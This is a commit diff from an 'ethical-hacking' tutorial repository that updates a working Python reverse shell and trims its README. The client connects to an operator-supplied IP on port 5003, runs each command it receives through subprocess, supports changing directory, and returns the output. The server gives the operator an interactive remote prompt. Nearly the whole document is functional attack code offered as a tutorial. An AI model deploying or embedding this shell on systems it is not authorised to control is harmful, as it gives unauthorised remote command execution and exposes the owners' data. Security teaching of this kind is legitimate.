update reverse shell tutorial code

Author: x4nth055

Diff for: ethical-hacking/reverse_shell/README.md

@@ -12,22 +12,4 @@ You don't need to install anything.
     ```
     python client.py 192.168.1.104
     ```
-    **Output:**
-    ```
-    Server: Hello and Welcome
-    ```
-- The server will get notified once a client is connected, executing `dir` command on Windows remotely (in `server.py`):
-    ```
-    192.168.1.103:58428 Connected!
-    Enter the command you wanna execute:dir
-    Volume in drive E is DATA
-    Volume Serial Number is 644B-A12C
-
-    Directory of E:\test
-
-    09/24/2019  02:15 PM    <DIR>          .
-    09/24/2019  02:15 PM    <DIR>          ..
-                0 File(s)              0 bytes
-                2 Dir(s)  89,655,123,968 bytes free
-    Enter the command you wanna execute:exit
-    ```
+- The server will get notified once a client is connected.

Diff for: ethical-hacking/reverse_shell/client.py

@@ -1,29 +1,46 @@
 import socket
+import os
 import subprocess
 import sys
 
 SERVER_HOST = sys.argv[1]
 SERVER_PORT = 5003
-BUFFER_SIZE = 1024
+BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase
+# separator string for sending 2 messages in one go
+SEPARATOR = "<sep>"
 
 # create the socket object
 s = socket.socket()
 # connect to the server
 s.connect((SERVER_HOST, SERVER_PORT))
-
-# receive the greeting message
-message = s.recv(BUFFER_SIZE).decode()
-print("Server:", message)
+# get the current directory
+cwd = os.getcwd()
+s.send(cwd.encode())
 
 while True:
     # receive the command from the server
     command = s.recv(BUFFER_SIZE).decode()
+    splited_command = command.split()
     if command.lower() == "exit":
         # if the command is exit, just break out of the loop
         break
-    # execute the command and retrieve the results
-    output = subprocess.getoutput(command)
+    if splited_command[0].lower() == "cd":
+        # cd command, change directory
+        try:
+            os.chdir(' '.join(splited_command[1:]))
+        except FileNotFoundError as e:
+            # if there is an error, set as the output
+            output = str(e)
+        else:
+            # if operation is successful, empty message
+            output = ""
+    else:
+        # execute the command and retrieve the results
+        output = subprocess.getoutput(command)
+    # get the current working directory as output
+    cwd = os.getcwd()
     # send the results back to the server
-    s.send(output.encode())
+    message = f"{output}{SEPARATOR}{cwd}"
+    s.send(message.encode())
 # close client connection
 s.close()

Diff for: ethical-hacking/reverse_shell/server.py

@@ -2,8 +2,9 @@
 
 SERVER_HOST = "0.0.0.0"
 SERVER_PORT = 5003
-
-BUFFER_SIZE = 1024
+BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase
+# separator string for sending 2 messages in one go
+SEPARATOR = "<sep>"
 
 # create a socket object
 s = socket.socket()
@@ -20,21 +21,27 @@
 client_socket, client_address = s.accept()
 print(f"{client_address[0]}:{client_address[1]} Connected!")
 
-# just sending a message, for demonstration purposes
-message = "Hello and Welcome".encode()
-client_socket.send(message)
+# receiving the current working directory of the client
+cwd = client_socket.recv(BUFFER_SIZE).decode()
+print("[+] Current working directory:", cwd)
 
 while True:
     # get the command from prompt
-    command = input("Enter the command you wanna execute:")
+    command = input(f"{cwd} $> ")
+    if not command.strip():
+        # empty command
+        continue
     # send the command to the client
     client_socket.send(command.encode())
     if command.lower() == "exit":
         # if the command is exit, just break out of the loop
         break
     # retrieve command results
-    results = client_socket.recv(BUFFER_SIZE).decode()
-    # print them
+    output = client_socket.recv(BUFFER_SIZE).decode()
+    print("output:", output)
+    # split command output and current directory
+    results, cwd = output.split(SEPARATOR)
+    # print output
     print(results)
 # close connection to the client
 client_socket.close()